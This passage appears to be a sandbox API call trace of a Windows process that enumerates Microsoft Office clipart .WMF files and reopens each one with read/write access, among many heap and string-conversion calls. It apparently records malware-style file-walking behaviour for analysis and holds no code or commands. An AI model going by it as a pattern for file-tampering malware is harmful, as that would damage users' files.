Size=0x8) returned 0x7cf20 [0101.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0101.919] AreFileApisANSI () returned 1 [0101.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.920] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0101.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 69 [0101.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.920] GetFileType (hFile=0x368) returned 0x1 [0101.920] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0101.920] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.920] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.920] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.921] CloseHandle (hObject=0x368) returned 1 [0101.921] AreFileApisANSI () returned 1 [0101.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a790 [0101.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 69 [0101.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.921] GetFileType (hFile=0x368) returned 0x1 [0101.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0101.921] CloseHandle (hObject=0x368) returned 1 [0101.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0101.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0101.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0101.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0101.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0101.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0101.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.923] AreFileApisANSI () returned 1 [0101.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0101.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 69 [0101.923] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7114)) returned 1 [0101.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0101.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0101.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0101.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.923] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d74, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD00155_.WMF", cAlternateFileName="")) returned 1 [0101.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0101.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0101.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0101.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0101.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0101.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0101.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0101.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0101.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0101.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0101.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0101.924] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.924] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.924] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.924] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0101.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.924] AreFileApisANSI () returned 1 [0101.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0101.924] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.924] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0101.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0101.924] AreFileApisANSI () returned 1 [0101.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ae18 [0101.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 69 [0101.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.925] GetFileType (hFile=0x368) returned 0x1 [0101.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0101.925] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.925] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.925] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.926] CloseHandle (hObject=0x368) returned 1 [0101.926] AreFileApisANSI () returned 1 [0101.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0101.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 69 [0101.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.926] GetFileType (hFile=0x368) returned 0x1 [0101.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0101.926] CloseHandle (hObject=0x368) returned 1 [0101.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0101.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0101.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0101.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0101.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.928] AreFileApisANSI () returned 1 [0101.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0101.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 69 [0101.928] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d74)) returned 1 [0101.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0101.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0101.928] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.928] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.928] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x57f4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD00160_.WMF", cAlternateFileName="")) returned 1 [0101.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0101.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0101.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0101.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0101.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0101.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0101.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0101.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 